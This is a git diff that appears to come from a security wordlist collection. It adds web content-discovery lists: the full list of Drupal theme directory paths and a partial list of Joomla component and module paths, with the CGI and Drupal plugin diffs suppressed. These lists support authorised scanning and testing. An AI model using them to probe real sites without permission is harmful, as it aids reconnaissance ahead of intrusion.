Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
|
3948
discovery/generic/cgi-x-platform.txt
Normal file
3948
discovery/generic/cgi-x-platform.txt
Normal file
File diff suppressed because it is too large
Load diff
6320
discovery/generic/cms/drupal_plugins.txt
Normal file
6320
discovery/generic/cms/drupal_plugins.txt
Normal file
File diff suppressed because it is too large
Load diff
828
discovery/generic/cms/drupal_themes.txt
Normal file
828
discovery/generic/cms/drupal_themes.txt
Normal file
|
@ -0,0 +1,828 @@
|
|||
themes/001%20Dev%20Skin/
|
||||
themes/001_dev_skin/
|
||||
themes/002_dev_skin/
|
||||
themes/08paros/
|
||||
themes/1024px/
|
||||
themes/4_of_July/
|
||||
themes/Aeon5/
|
||||
themes/Alina/
|
||||
themes/Amare/
|
||||
themes/Amor_Azul/
|
||||
themes/Andreas1024px/
|
||||
themes/Autumn/
|
||||
themes/B7/
|
||||
themes/BlueSquare/
|
||||
themes/Bonsai/
|
||||
themes/Bubbles/
|
||||
themes/ChaiGaram/
|
||||
themes/Colorart/
|
||||
themes/CristalX4Drupal/
|
||||
themes/DrupalRefresh/
|
||||
themes/DuoFertility/
|
||||
themes/Earth_birthday/
|
||||
themes/Fall/
|
||||
themes/Grassroutes/
|
||||
themes/HWCTravel/
|
||||
themes/Internet_Broadcast/
|
||||
themes/Internet_Corporation/
|
||||
themes/July4/
|
||||
themes/Kyrgyzstan/
|
||||
themes/MyDrupal-Tidy/
|
||||
themes/MyDrupal/
|
||||
themes/MyDrupal_Impact/
|
||||
themes/MyDrupal_Universal/
|
||||
themes/MyTree/
|
||||
themes/NukeNews/
|
||||
themes/Odeta/
|
||||
themes/Pixeled/
|
||||
themes/Plain1/
|
||||
themes/Pleroma/
|
||||
themes/Purple_Beauty/
|
||||
themes/SEOposition/
|
||||
themes/SHINOBI/
|
||||
themes/SanQReLl/
|
||||
themes/SkyLine/
|
||||
themes/Stasis/
|
||||
themes/SynFox/
|
||||
themes/TVframe/
|
||||
themes/Tendu/
|
||||
themes/XTemplate_Tableless/
|
||||
themes/a-cloudy-day/
|
||||
themes/a3_atlantis/
|
||||
themes/aBeesParadise/
|
||||
themes/abac/
|
||||
themes/abaca/
|
||||
themes/abarre/
|
||||
themes/aberdeen/
|
||||
themes/abessive/
|
||||
themes/ability/
|
||||
themes/ablaze/
|
||||
themes/ablock/
|
||||
themes/ablogtheme/
|
||||
themes/aboutpeople/
|
||||
themes/absolution/
|
||||
themes/abstract/
|
||||
themes/absynthe/
|
||||
themes/abundant/
|
||||
themes/aclide/
|
||||
themes/acoldday/
|
||||
themes/acquia_marina/
|
||||
themes/acquia_prosper/
|
||||
themes/acquia_slate/
|
||||
themes/acrylic/
|
||||
themes/acta/
|
||||
themes/active_n_rebuild/
|
||||
themes/activesigns/
|
||||
themes/activesite/
|
||||
themes/ad_agency/
|
||||
themes/ad_blueprint/
|
||||
themes/ad_lemon-twist/
|
||||
themes/ad_novus/
|
||||
themes/ad_redoable/
|
||||
themes/ad_the-morning-after/
|
||||
themes/adaptivetheme/
|
||||
themes/adaptivetheme_mobile/
|
||||
themes/adarkproxisstheme/
|
||||
themes/adc/
|
||||
themes/addari/
|
||||
themes/adm_like_xp/
|
||||
themes/admire-gray/
|
||||
themes/admire-navy/
|
||||
themes/admire-orange/
|
||||
themes/admire_gray/
|
||||
themes/admire_grunge/
|
||||
themes/adt_basetheme/
|
||||
themes/adt_webapplication/
|
||||
themes/affaires/
|
||||
themes/agregado/
|
||||
themes/agua/
|
||||
themes/airyblue/
|
||||
themes/alchemist/
|
||||
themes/alek_2_0/
|
||||
themes/algaglas/
|
||||
themes/alina/
|
||||
themes/almaw/
|
||||
themes/alpha/
|
||||
themes/alphorn/
|
||||
themes/amadou/
|
||||
themes/amity_island/
|
||||
themes/analytic/
|
||||
themes/andreas/
|
||||
themes/andreas00/
|
||||
themes/andreas01/
|
||||
themes/andreas02/
|
||||
themes/andreas03/
|
||||
themes/andreas04/
|
||||
themes/andreas05/
|
||||
themes/andreas06/
|
||||
themes/andreas07/
|
||||
themes/andreas08/
|
||||
themes/andreas09/
|
||||
themes/andreas1_tal/
|
||||
themes/anitakravitz/
|
||||
themes/antique_modern/
|
||||
themes/appleweb/
|
||||
themes/aqua_fish/
|
||||
themes/aquanaut/
|
||||
themes/aquasoft/
|
||||
themes/arclitetheme/
|
||||
themes/arcmateria/
|
||||
themes/argeebee/
|
||||
themes/art4-blue/
|
||||
themes/art4_blue/
|
||||
themes/art4_green/
|
||||
themes/arthemia/
|
||||
themes/artistsC01/
|
||||
themes/artschool/
|
||||
themes/artsy/
|
||||
themes/async/
|
||||
themes/at_koda/
|
||||
themes/at_panels_everywhere/
|
||||
themes/atck/
|
||||
themes/atrium_simple/
|
||||
themes/aurora/
|
||||
themes/austere/
|
||||
themes/austin/
|
||||
themes/autumn_almanac/
|
||||
themes/awesome/
|
||||
themes/ax/
|
||||
themes/ax_clean/
|
||||
themes/barlow/
|
||||
themes/barron/
|
||||
themes/bartik/
|
||||
themes/base/
|
||||
themes/base_theme/
|
||||
themes/baseline/
|
||||
themes/baselinecss/
|
||||
themes/basic/
|
||||
themes/basic_sass/
|
||||
themes/basketball/
|
||||
themes/beach/
|
||||
themes/beat/
|
||||
themes/beginning/
|
||||
themes/beginningW2/
|
||||
themes/berylizer/
|
||||
themes/bidi/
|
||||
themes/biz/
|
||||
themes/black_getsred/
|
||||
themes/black_mamba/
|
||||
themes/blackout/
|
||||
themes/blackpark/
|
||||
themes/blackprak/
|
||||
themes/blank/
|
||||
themes/bleech/
|
||||
themes/blix/
|
||||
themes/blogbuzz/
|
||||
themes/bloggrail/
|
||||
themes/blogsmith/
|
||||
themes/blommor01/
|
||||
themes/blossom/
|
||||
themes/blue_bars/
|
||||
themes/blue_zinfandel/
|
||||
themes/blueberryboat/
|
||||
themes/bluebreeze/
|
||||
themes/bluecitron/
|
||||
themes/bluecurve/
|
||||
themes/bluefire/
|
||||
themes/bluefreedom/
|
||||
themes/bluefun/
|
||||
themes/bluefx/
|
||||
themes/blueish/
|
||||
themes/bluelake/
|
||||
themes/bluemarine
|
||||
themes/bluemarine/
|
||||
themes/bluemarine_ets/
|
||||
themes/bluemarine_smarty/
|
||||
themes/bluenile/
|
||||
themes/blueprint/
|
||||
themes/bluerobot/
|
||||
themes/bluerobot2/
|
||||
themes/bluespan/
|
||||
themes/bluetrip/
|
||||
themes/bluezone/
|
||||
themes/bookstore/
|
||||
themes/box_grey/
|
||||
themes/box_grey_rtl/
|
||||
themes/box_grey_smarty/
|
||||
themes/brainstorm/
|
||||
themes/brooklyn/
|
||||
themes/browntown/
|
||||
themes/browny/
|
||||
themes/brushed_steel/
|
||||
themes/bubbles/
|
||||
themes/burnt/
|
||||
themes/burnt_rubber/
|
||||
themes/busy/
|
||||
themes/bz_lite/
|
||||
themes/camaxtli/
|
||||
themes/camsel/
|
||||
themes/candy_corn/
|
||||
themes/candy_corn_rtl/
|
||||
themes/cdmug/
|
||||
themes/celadon/
|
||||
themes/celestial/
|
||||
themes/celju/
|
||||
themes/cgiirc/
|
||||
themes/chameleon
|
||||
themes/chameleon/
|
||||
themes/chamfer/
|
||||
themes/changeme/
|
||||
themes/channel_nine/
|
||||
themes/charity/
|
||||
themes/cherryblossom/
|
||||
themes/chiquechick/
|
||||
themes/chitown/
|
||||
themes/choclatebrown/
|
||||
themes/chocotheme/
|
||||
themes/chrono/
|
||||
themes/chrysalis/
|
||||
themes/civicspace/
|
||||
themes/clean-a/
|
||||
themes/clean/
|
||||
themes/cleanfolio/
|
||||
themes/cleanr/
|
||||
themes/cleanslate/
|
||||
themes/cleanstate/
|
||||
themes/clear_dark/
|
||||
themes/clearblue/
|
||||
themes/clearlooks/
|
||||
themes/clementine/
|
||||
themes/cms-theme/
|
||||
themes/cod_organizing/
|
||||
themes/collab/
|
||||
themes/colorcss/
|
||||
themes/colorfulness/
|
||||
themes/colorfulness_theme/
|
||||
themes/colorpaper/
|
||||
themes/colourise/
|
||||
themes/combustion/
|
||||
themes/compact_lime/
|
||||
themes/conch/
|
||||
themes/conference/
|
||||
themes/connections/
|
||||
themes/console/
|
||||
themes/contented7/
|
||||
themes/contrast/
|
||||
themes/contributions/
|
||||
themes/coolwater/
|
||||
themes/coolweb/
|
||||
themes/copyblogger/
|
||||
themes/corolla/
|
||||
themes/crusti/
|
||||
themes/crystalxl/
|
||||
themes/csszg/
|
||||
themes/cti_flex/
|
||||
themes/cws/
|
||||
themes/d4rk/
|
||||
themes/d7ux/
|
||||
themes/daleri-structure/
|
||||
themes/dance/
|
||||
themes/danger4k/
|
||||
themes/danland/
|
||||
themes/dark/
|
||||
themes/darkblue/
|
||||
themes/darkelegance/
|
||||
themes/darkgrail/
|
||||
themes/darkgreen/
|
||||
themes/darsch/
|
||||
themes/decayed/
|
||||
themes/deco/
|
||||
themes/delicious_fruit/
|
||||
themes/deliciously_blue/
|
||||
themes/delocalized/
|
||||
themes/democratica/
|
||||
themes/denver/
|
||||
themes/dessert/
|
||||
themes/devavrata_free_bare/
|
||||
themes/diary/
|
||||
themes/dichotomy/
|
||||
themes/dingus/
|
||||
themes/dotted/
|
||||
themes/dovetail/
|
||||
themes/dreamy/
|
||||
themes/dropshadow/
|
||||
themes/drucer/
|
||||
themes/drupal-de-1/
|
||||
themes/drupalui/
|
||||
themes/drupazine/
|
||||
themes/drupera/
|
||||
themes/drupify/
|
||||
themes/dusky/
|
||||
themes/earthen/
|
||||
themes/earthish/
|
||||
themes/easybreeze/
|
||||
themes/ebizon_exotic_red/
|
||||
themes/ebizon_redfire/
|
||||
themes/ecobusiness/
|
||||
themes/eldir/
|
||||
themes/elegant/
|
||||
themes/elements_theme/
|
||||
themes/emspace_2007/
|
||||
themes/emspace_basic/
|
||||
themes/energetic/
|
||||
themes/enlight/
|
||||
themes/eponymous/
|
||||
themes/equalizer/
|
||||
themes/erp_theme/
|
||||
themes/eve_igb/
|
||||
themes/evening/
|
||||
themes/exquisite/
|
||||
themes/extended/
|
||||
themes/fadethingee/
|
||||
themes/fall/
|
||||
themes/fancy/
|
||||
themes/fancy_rtl/
|
||||
themes/fblike/
|
||||
themes/fern/
|
||||
themes/fervens/
|
||||
themes/fields/
|
||||
themes/fields_2009/
|
||||
themes/filmforge_theme/
|
||||
themes/fireflystreamcom/
|
||||
themes/five/
|
||||
themes/five_blog/
|
||||
themes/fiveseasons/
|
||||
themes/flatforum/
|
||||
themes/flattering/
|
||||
themes/flexible/
|
||||
themes/flexlogin/
|
||||
themes/fluid/
|
||||
themes/fluidgrid/
|
||||
themes/foliage/
|
||||
themes/forest_floor/
|
||||
themes/foundation/
|
||||
themes/fourseasons/
|
||||
themes/fourseasonsDRUPAL-6/
|
||||
themes/framework/
|
||||
themes/freeradicals/
|
||||
themes/freestyle/
|
||||
themes/fresh_media/
|
||||
themes/friendselectric/
|
||||
themes/friendsforever/
|
||||
themes/frisbee/
|
||||
themes/fruity/
|
||||
themes/fueldeluxe/
|
||||
themes/fusion/
|
||||
themes/fusiontheme/
|
||||
themes/gagarin/
|
||||
themes/garamond/
|
||||
themes/gardening/
|
||||
themes/garland
|
||||
themes/garland-smarty/
|
||||
themes/garland/
|
||||
themes/garlandrtl/
|
||||
themes/gateway/
|
||||
themes/gbif/
|
||||
themes/generic/
|
||||
themes/genesis/
|
||||
themes/genesis_LITE/
|
||||
themes/genesis_coldday/
|
||||
themes/genesis_darkmatter/
|
||||
themes/genesis_typo1/
|
||||
themes/genesis_webify/
|
||||
themes/genesis_webx/
|
||||
themes/genesis_zine/
|
||||
themes/german_newspaper/
|
||||
themes/gespaa/
|
||||
themes/global/
|
||||
themes/glorillacomtheme/
|
||||
themes/glossyblue/
|
||||
themes/golden_hour/
|
||||
themes/goldengray/
|
||||
themes/goldfish/
|
||||
themes/gommutheme/
|
||||
themes/goofy
|
||||
themes/goofy/
|
||||
themes/grass/
|
||||
themes/grassland/
|
||||
themes/green/
|
||||
themes/greenNblack/
|
||||
themes/greenhouse/
|
||||
themes/greenmarinee/
|
||||
themes/greenpark/
|
||||
themes/greens/
|
||||
themes/greenthing/
|
||||
themes/greeny_blu/
|
||||
themes/grid_inspired/
|
||||
themes/gulmohar/
|
||||
themes/gunmetal/
|
||||
themes/gutenberg/
|
||||
themes/gworks/
|
||||
themes/happypixels/
|
||||
themes/hariyali/
|
||||
themes/helvetica/
|
||||
themes/hexagon/
|
||||
themes/hiroshige/
|
||||
themes/hiroshigeblue/
|
||||
themes/holygrail/
|
||||
themes/hopestation/
|
||||
themes/htmlzero/
|
||||
themes/hunchbaque/
|
||||
themes/hydra/
|
||||
themes/hyperglass/
|
||||
themes/iTheme2/
|
||||
themes/icandy/
|
||||
themes/icons/
|
||||
themes/id-facta/
|
||||
themes/idrupal_ui/
|
||||
themes/idthemes/
|
||||
themes/ifeeldirty/
|
||||
themes/igniter/
|
||||
themes/illusion/
|
||||
themes/images/
|
||||
themes/imagination/
|
||||
themes/img/
|
||||
themes/industrial/
|
||||
themes/inf08/
|
||||
themes/inkribbon/
|
||||
themes/inove/
|
||||
themes/insanitarium/
|
||||
themes/integral/
|
||||
themes/interactive_media/
|
||||
themes/interlaced/
|
||||
themes/internet_center/
|
||||
themes/internet_jobs/
|
||||
themes/internet_music/
|
||||
themes/internet_services/
|
||||
themes/internet_services_rtl/
|
||||
themes/internetservices/
|
||||
themes/inva/
|
||||
themes/iron/
|
||||
themes/ishalist/
|
||||
themes/itheme/
|
||||
themes/iui/
|
||||
themes/ivy/
|
||||
themes/iwebkit/
|
||||
themes/jaded/
|
||||
themes/jeroen
|
||||
themes/jeroen/
|
||||
themes/jesox_mmozine/
|
||||
themes/joker/
|
||||
themes/jp_mobile/
|
||||
themes/jq4dat/
|
||||
themes/jq_theme/
|
||||
themes/jqtouch/
|
||||
themes/juventus/
|
||||
themes/k2/
|
||||
themes/k2_smarty/
|
||||
themes/keepitsimple/
|
||||
themes/kexolid/
|
||||
themes/koi/
|
||||
themes/kommunity/
|
||||
themes/kubrick/
|
||||
themes/larepublique/
|
||||
themes/launchpad/
|
||||
themes/layoutstudio/
|
||||
themes/leaf/
|
||||
themes/leaf_smarty/
|
||||
themes/leaves/
|
||||
themes/lemontwist/
|
||||
themes/lichtgestalt/
|
||||
themes/light/
|
||||
themes/light_and_simple_blues/
|
||||
themes/light_brown/
|
||||
themes/lightfantastic/
|
||||
themes/lightgreen/
|
||||
themes/lincolns_revenge/
|
||||
themes/linkit/
|
||||
themes/litejazz/
|
||||
themes/lumen/
|
||||
themes/magazeen/
|
||||
themes/magwood/
|
||||
themes/manage-theme/
|
||||
themes/manage/
|
||||
themes/manji/
|
||||
themes/manollio_rtl/
|
||||
themes/manuscript/
|
||||
themes/marinelli/
|
||||
themes/marketplace/
|
||||
themes/marketstate/
|
||||
themes/marvin
|
||||
themes/marvin/
|
||||
themes/marvin_2k/
|
||||
themes/marvin_2k_phptemplate/
|
||||
themes/marvinclassic/
|
||||
themes/mediarevolution/
|
||||
themes/meta/
|
||||
themes/millwood/
|
||||
themes/mini_blog/
|
||||
themes/minimalist/
|
||||
themes/mistylook/
|
||||
themes/mobi/
|
||||
themes/mobile/
|
||||
themes/mobile_garland/
|
||||
themes/modernbird/
|
||||
themes/modules/
|
||||
themes/moleskine/
|
||||
themes/mollio/
|
||||
themes/mondrian/
|
||||
themes/monochrome/
|
||||
themes/moshpit/
|
||||
themes/mothership/
|
||||
themes/motion/
|
||||
themes/mpFREE/
|
||||
themes/mt/
|
||||
themes/mulpo/
|
||||
themes/multiflex/
|
||||
themes/multiflex21/
|
||||
themes/multiflex3/
|
||||
themes/multiflex37/
|
||||
themes/musicdj/
|
||||
themes/mydrupal_impact5/
|
||||
themes/mystique/
|
||||
themes/n_rebuild/
|
||||
themes/n_rebuild_2/
|
||||
themes/n_rebuild_3/
|
||||
themes/nautica05/
|
||||
themes/nautica09/
|
||||
themes/neewee/
|
||||
themes/nerdalistic/
|
||||
themes/new-abundant/
|
||||
themes/newfangled/
|
||||
themes/newhorizon/
|
||||
themes/newsflash/
|
||||
themes/newskin/
|
||||
themes/newsportal/
|
||||
themes/newsportal02/
|
||||
themes/newswire/
|
||||
themes/ngp/
|
||||
themes/nifty50/
|
||||
themes/niftyCorners/
|
||||
themes/nifty_drupal/
|
||||
themes/nigraphic/
|
||||
themes/ninesixty/
|
||||
themes/ninesixtyfluid/
|
||||
themes/ninesixtyrobots/
|
||||
themes/nirvana/
|
||||
themes/nirvana_fluid/
|
||||
themes/nista/
|
||||
themes/nitobe/
|
||||
themes/nixer/
|
||||
themes/nokia_mobile/
|
||||
themes/nokoala/
|
||||
themes/nonzero/
|
||||
themes/nonzerored/
|
||||
themes/noprob/
|
||||
themes/notechaos/
|
||||
themes/nothing/
|
||||
themes/obsidian/
|
||||
themes/ocadia/
|
||||
themes/occy/
|
||||
themes/offline/
|
||||
themes/olav/
|
||||
themes/omega/
|
||||
themes/oocss/
|
||||
themes/openpublish_theme/
|
||||
themes/orange-mint/
|
||||
themes/orange/
|
||||
themes/oranzh/
|
||||
themes/orchard/
|
||||
themes/osmobi-mobile/
|
||||
themes/oxidation/
|
||||
themes/painted/
|
||||
themes/panany/
|
||||
themes/panels_960gs/
|
||||
themes/paper/
|
||||
themes/paradise/
|
||||
themes/pearls/
|
||||
themes/persian/
|
||||
themes/personal/
|
||||
themes/pgtheme/
|
||||
themes/philarts_theme2/
|
||||
themes/phpbb3/
|
||||
themes/phptemplate/
|
||||
themes/pinkish/
|
||||
themes/pinkribbon/
|
||||
themes/pinstripes/
|
||||
themes/pixel/
|
||||
themes/pixture/
|
||||
themes/pixture_reloaded/
|
||||
themes/plain/
|
||||
themes/plain2/
|
||||
themes/plaingrail/
|
||||
themes/plainscape/
|
||||
themes/pluralism/
|
||||
themes/plutado/
|
||||
themes/plutado_blue/
|
||||
themes/plutado_green/
|
||||
themes/plutado_grey/
|
||||
themes/plutado_red/
|
||||
themes/plutado_wide/
|
||||
themes/pockett/
|
||||
themes/polder/
|
||||
themes/polpo/
|
||||
themes/portal_blue/
|
||||
themes/powerfulpink/
|
||||
themes/professional/
|
||||
themes/protocons/
|
||||
themes/purple_beauty/
|
||||
themes/purple_box/
|
||||
themes/pushbutton
|
||||
themes/pushbutton/
|
||||
themes/pushbutton_phptemplate/
|
||||
themes/quicksilver/
|
||||
themes/radiant/
|
||||
themes/ramadan/
|
||||
themes/ranch/
|
||||
themes/raw/
|
||||
themes/rdc/
|
||||
themes/recycled/
|
||||
themes/red_ruby/
|
||||
themes/redhot/
|
||||
themes/reflection/
|
||||
themes/reflek/
|
||||
themes/refresco/
|
||||
themes/refresh/
|
||||
themes/relax/
|
||||
themes/renecance/
|
||||
themes/retroadmin/
|
||||
themes/rezina/
|
||||
themes/riebel/
|
||||
themes/rootcandy/
|
||||
themes/roundness/
|
||||
themes/royal/
|
||||
themes/salamander-6/
|
||||
themes/salamander/
|
||||
themes/salamanderskins/
|
||||
themes/sandbox-theme/
|
||||
themes/sandium/
|
||||
themes/sands/
|
||||
themes/sands_css/
|
||||
themes/sandtiger/
|
||||
themes/sanqreal/
|
||||
themes/sapo/
|
||||
themes/scaccarium/
|
||||
themes/scratch/
|
||||
themes/scribbish/
|
||||
themes/scruffy-desk/
|
||||
themes/scruffy/
|
||||
themes/sea_breeze/
|
||||
themes/seanr_xhtml/
|
||||
themes/seven
|
||||
themes/seven/
|
||||
themes/shakennotstirred/
|
||||
themes/shallowgrunge/
|
||||
themes/shampoo/
|
||||
themes/sharepoint-like/
|
||||
themes/shopwindow/
|
||||
themes/sib/
|
||||
themes/siberia/
|
||||
themes/simpla/
|
||||
themes/simple/
|
||||
themes/simple_blog/
|
||||
themes/simple_web/
|
||||
themes/simplefolio/
|
||||
themes/simpler/
|
||||
themes/simplex/
|
||||
themes/simplex2/
|
||||
themes/simplicity/
|
||||
themes/simply_modern/
|
||||
themes/simplygreen/
|
||||
themes/sinatra/
|
||||
themes/sitebrowser_basic/
|
||||
themes/sk8/
|
||||
themes/sketchit/
|
||||
themes/sky/
|
||||
themes/skyline/
|
||||
themes/skyliner/
|
||||
themes/skymod/
|
||||
themes/skyroots/
|
||||
themes/slash/
|
||||
themes/slashin/
|
||||
themes/slate
|
||||
themes/slate/
|
||||
themes/slurpee/
|
||||
themes/smarty/
|
||||
themes/smashing_dilectio/
|
||||
themes/smoothBlue/
|
||||
themes/smooth_blue/
|
||||
themes/snd/
|
||||
themes/soccer/
|
||||
themes/social/
|
||||
themes/sodelicious/
|
||||
themes/softwhite/
|
||||
themes/solarflare/
|
||||
themes/soldier/
|
||||
themes/solemnity/
|
||||
themes/solon/
|
||||
themes/somethingspecial/
|
||||
themes/sonbol/
|
||||
themes/sor/
|
||||
themes/splender/
|
||||
themes/spooner/
|
||||
themes/sports/
|
||||
themes/spreadfirefox/
|
||||
themes/spring/
|
||||
themes/spring_bloom/
|
||||
themes/spring_theme/
|
||||
themes/stark
|
||||
themes/stark/
|
||||
themes/starkish/
|
||||
themes/stilton/
|
||||
themes/strange_little_town/
|
||||
themes/strix/
|
||||
themes/studio/
|
||||
themes/stylebox/
|
||||
themes/styleswitcher/
|
||||
themes/stylized_beauty/
|
||||
themes/summerholiday/
|
||||
themes/summertime/
|
||||
themes/sunflower/
|
||||
themes/sunny_sky/
|
||||
themes/sunset/
|
||||
themes/superclean/
|
||||
themes/supriya/
|
||||
themes/surface/
|
||||
themes/sussex/
|
||||
themes/sweethome/
|
||||
themes/sympal_theme/
|
||||
themes/synfox/
|
||||
themes/tableless/
|
||||
themes/tal_grey/
|
||||
themes/tapestry/
|
||||
themes/tarski/
|
||||
themes/tattler_theme/
|
||||
themes/tech/
|
||||
themes/teh/
|
||||
themes/teleology/
|
||||
themes/templist/
|
||||
themes/tendu/
|
||||
themes/terrafirma/
|
||||
themes/terrafirma_theme/
|
||||
themes/test/
|
||||
themes/texas/
|
||||
themes/themename/
|
||||
themes/themes/
|
||||
themes/themetastic/
|
||||
themes/thirteen/
|
||||
themes/tinsel/
|
||||
themes/tivity/
|
||||
themes/tma/
|
||||
themes/toasted/
|
||||
themes/touch/
|
||||
themes/tranquility/
|
||||
themes/travel/
|
||||
themes/treedesert/
|
||||
themes/trillian
|
||||
themes/trillian/
|
||||
themes/trip/
|
||||
themes/triumviratum/
|
||||
themes/turquoise/
|
||||
themes/twilight/
|
||||
themes/twittish/
|
||||
themes/typography_paramount/
|
||||
themes/typoversicol/
|
||||
themes/ubiquity/
|
||||
themes/udtheme/
|
||||
themes/ufutbol/
|
||||
themes/ultimate960/
|
||||
themes/uncomplicated/
|
||||
themes/unconed
|
||||
themes/unconed/
|
||||
themes/untheme/
|
||||
themes/unthemes/
|
||||
themes/vertigo/
|
||||
themes/vigilianty/
|
||||
themes/vineyard/
|
||||
themes/vitzo/
|
||||
themes/vitzo_flex/
|
||||
themes/voodoo/
|
||||
themes/voodoo_dolly/
|
||||
themes/votebob/
|
||||
themes/wabi/
|
||||
themes/waffles/
|
||||
themes/wall/
|
||||
themes/warmy/
|
||||
themes/warped/
|
||||
themes/web110/
|
||||
themes/webchick/
|
||||
themes/wgbluemarine/
|
||||
themes/whatsinitsname/
|
||||
themes/whatsyoursolution/
|
||||
themes/wilderness/
|
||||
themes/winter_wonderland/
|
||||
themes/wireframe/
|
||||
themes/wowtheme/
|
||||
themes/wyo/
|
||||
themes/xsilver/
|
||||
themes/xtemplate/
|
||||
themes/xwebAeon4/
|
||||
themes/yaroon
|
||||
themes/yaroon/
|
||||
themes/yarooned/
|
||||
themes/yast/
|
||||
themes/yui-framework/
|
||||
themes/yui/
|
||||
themes/yui_grid/
|
||||
themes/zen/
|
||||
themes/zen_basic/
|
||||
themes/zen_deleon2/
|
||||
themes/zen_midnight/
|
||||
themes/zen_ninesixty/
|
||||
themes/zen_twilight/
|
||||
themes/zenland/
|
||||
themes/zental/
|
||||
themes/zenzen/
|
||||
themes/zeropoint/
|
||||
themes/zilo_blog/
|
||||
themes/zubrick/
|
224
discovery/generic/cms/joomla_plugins.txt
Normal file
224
discovery/generic/cms/joomla_plugins.txt
Normal file
|
@ -0,0 +1,224 @@
|
|||
components/com_acajoom/
|
||||
components/com_aclassf/
|
||||
components/com_acmisc/
|
||||
components/com_adsmanager/
|
||||
components/com_agora/
|
||||
components/com_ajaxchat/
|
||||
components/com_akogallery/
|
||||
components/com_album/
|
||||
components/com_allvideosreloaded/
|
||||
components/com_alphauserpoints/
|
||||
components/com_aprice/
|
||||
components/com_artportal/
|
||||
components/com_avreloaded/
|
||||
components/com_banners/
|
||||
components/com_bfsurvey_basic/
|
||||
components/com_booklibrary/
|
||||
components/com_bookmarks/
|
||||
components/com_carman/
|
||||
components/com_cartikads/
|
||||
components/com_casino/
|
||||
components/com_cbresumebuilder/
|
||||
components/com_chatroom/
|
||||
components/com_ckforms/
|
||||
components/com_comment/
|
||||
components/com_comprofiler/
|
||||
components/com_contact/
|
||||
components/com_contactus/
|
||||
components/com_content/
|
||||
components/com_ContentBlogList/
|
||||
components/com_cronjobs/
|
||||
components/com_customquickicons/
|
||||
components/com_dhforum/
|
||||
components/com_digifolio/
|
||||
components/com_digistore/
|
||||
components/com_djcatalog/
|
||||
components/com_dm_orders/
|
||||
components/com_docman/
|
||||
components/com_doqment/
|
||||
components/com_easygallery/
|
||||
components/com_easygb/
|
||||
components/com_easygb2/
|
||||
components/com_eventlist/
|
||||
components/com_events/
|
||||
components/com_extplorer/
|
||||
components/com_ezine/
|
||||
components/com_ezrealty/
|
||||
components/com_facebook/
|
||||
components/com_facileforms/
|
||||
components/com_fastball/
|
||||
components/com_favourites/
|
||||
components/com_fireboard/
|
||||
components/com_flickr4j/
|
||||
components/com_foobla_suggestions/
|
||||
components/com_form/
|
||||
components/com_forum/
|
||||
components/com_frontpage/
|
||||
components/com_games/
|
||||
components/com_gameserver/
|
||||
components/com_gcalendar/
|
||||
components/com_groups/
|
||||
components/com_hbssearch/
|
||||
components/com_hiscat/
|
||||
components/com_icrmbasic/
|
||||
components/com_idoblog/
|
||||
components/com_intuit/
|
||||
components/com_intuitLocal/
|
||||
components/com_invite/
|
||||
components/com_jabode/
|
||||
components/com_jbook/
|
||||
components/com_jbudgetsmagic/
|
||||
components/com_jcalpro/
|
||||
components/com_jce/
|
||||
components/com_jcomments/
|
||||
components/com_jeemaarticlecollection/
|
||||
components/com_jinc/
|
||||
components/com_jmovies/
|
||||
components/com_job/
|
||||
components/com_jomcomment/
|
||||
components/com_joomap/
|
||||
components/com_joomfish/
|
||||
components/com_joomlapack/
|
||||
components/com_joomlastats/
|
||||
components/com_joomlaxplorer/
|
||||
components/com_joomportfolio/
|
||||
components/com_joomunity/
|
||||
components/com_j-projects/
|
||||
components/com_jreservation/
|
||||
components/com_jshop/
|
||||
components/com_jsjobs/
|
||||
components/com_jtips/
|
||||
components/com_juser/
|
||||
components/com_kide/
|
||||
components/com_letterman/
|
||||
components/com_livechat/
|
||||
components/com_login/
|
||||
components/com_mailto/
|
||||
components/com_media/
|
||||
components/com_messages/
|
||||
components/com_messenger/
|
||||
components/com_Mochigames/
|
||||
components/com_morfeoshow/
|
||||
components/com_moschat/
|
||||
components/com_mosres/
|
||||
components/com_mytube/
|
||||
components/com_network/
|
||||
components/com_newsfeeds/
|
||||
components/com_ninjacentral/
|
||||
components/com_omphotogallery/
|
||||
components/com_oprykningspoint_mc/
|
||||
components/com_otzivi/
|
||||
components/com_page/
|
||||
components/com_parainvite/
|
||||
components/com_paxxgallery/
|
||||
components/com_perchagallery/
|
||||
components/com_personel/
|
||||
components/com_photo/
|
||||
components/com_photoblog/
|
||||
components/com_places/
|
||||
components/com_poll/
|
||||
components/com_ponygallery/
|
||||
components/com_privmsgs/
|
||||
components/com_proofreader/
|
||||
components/com_qcache/
|
||||
components/com_rate/
|
||||
components/com_rating/
|
||||
components/com_registration/
|
||||
components/com_rsform/
|
||||
components/com_rsgallery2/
|
||||
components/com_rss/
|
||||
components/com_schools/
|
||||
components/com_search/
|
||||
components/com_sef/
|
||||
components/com_sef/
|
||||
components/com_seminar/
|
||||
components/com_seyret/
|
||||
components/com_shoutbox/
|
||||
components/com_siirler/
|
||||
components/com_simple_review/
|
||||
components/com_simpleshop/
|
||||
components/com_sobi2/
|
||||
components/com_soundset/
|
||||
components/com_sportfusion/
|
||||
components/com_store/
|
||||
components/com_subscribe/
|
||||
components/com_surveymanager/
|
||||
components/com_swmenufree/
|
||||
components/com_thumbnailpro/
|
||||
components/com_tpjobs/
|
||||
components/com_trabalhe_conosco/
|
||||
components/com_tupinambis/
|
||||
components/com_user/
|
||||
components/com_users/
|
||||
components/com_virtualkiss/
|
||||
components/com_virtuemart/
|
||||
components/com_vxdate/
|
||||
components/com_webcamxp/
|
||||
components/com_weblinks/
|
||||
components/com_weblogs/
|
||||
components/com_wrapper/
|
||||
components/com_wrapper/
|
||||
components/com_wrapper/
|
||||
components/com_xmap/
|
||||
components/com_zcalendar/
|
||||
components/js_relevant/
|
||||
modules/mod_adscroller/
|
||||
modules/mod_archive/
|
||||
modules/mod_articles_archive/
|
||||
modules/mod_articles_category/
|
||||
modules/mod_articles_latest/
|
||||
modules/mod_articles_news/
|
||||
modules/mod_articles_popular/
|
||||
modules/mod_banners/
|
||||
modules/mod_breadcrumbs/
|
||||
modules/mod_briaskISS/
|
||||
modules/mod_ccnewsletter/
|
||||
modules/mod_custom/
|
||||
modules/mod_dn/
|
||||
modules/mod_feed/
|
||||
modules/mod_filterednews/
|
||||
modules/mod_flashmod/
|
||||
modules/mod_footer/
|
||||
modules/mod_forme/
|
||||
modules/mod_gk_news_image/
|
||||
modules/mod_internetradio/
|
||||
